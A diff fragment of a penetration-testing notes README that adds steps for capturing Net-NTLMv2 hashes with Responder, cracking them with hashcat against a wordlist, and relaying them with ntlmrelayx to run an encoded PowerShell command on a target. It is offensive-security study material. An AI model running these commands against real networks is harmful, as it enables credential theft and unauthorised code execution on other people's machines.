seeu-inspace/easyg/README.md

    - `lsadump::sam` extracts the NTLM hashes from the SAM
 6. Run `hashcat --help | grep -i "ntlm"` to retrieve the correct hash mode
 7. `hashcat -m 1000 user.hash /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force`

+#### Cracking Net-NTLMv2 (or NTLMv2)

+Capture a Net-NTLMv2 hash
+1. `ip a` retrieve a list of all interfaces
+2. `sudo responder -I <interface>`
+3. Wait for a connection, capture the hash and save it as `user.hash`

+Crack the Net-NTLMv2 hash
+1. `hashcat --help | grep -i "ntlm"`
+2. `hashcat -m 5600 user.hash /usr/share/wordlists/rockyou.txt --force`

+Relaying Net-NTLMv2
+1. Instead of printing a retrieved Net-NTLMv2 hash, we'll forward it to `<IP>` that it's the target machine
+2. `sudo impacket-ntlmrelayx --no-http-server -smb2support -t <IP> -c "powershell -enc <BASE64>"`
+3. Now, if a user tries to connect to our machine, it will forward the request to `<IP>`

 #### Pass-the-Hash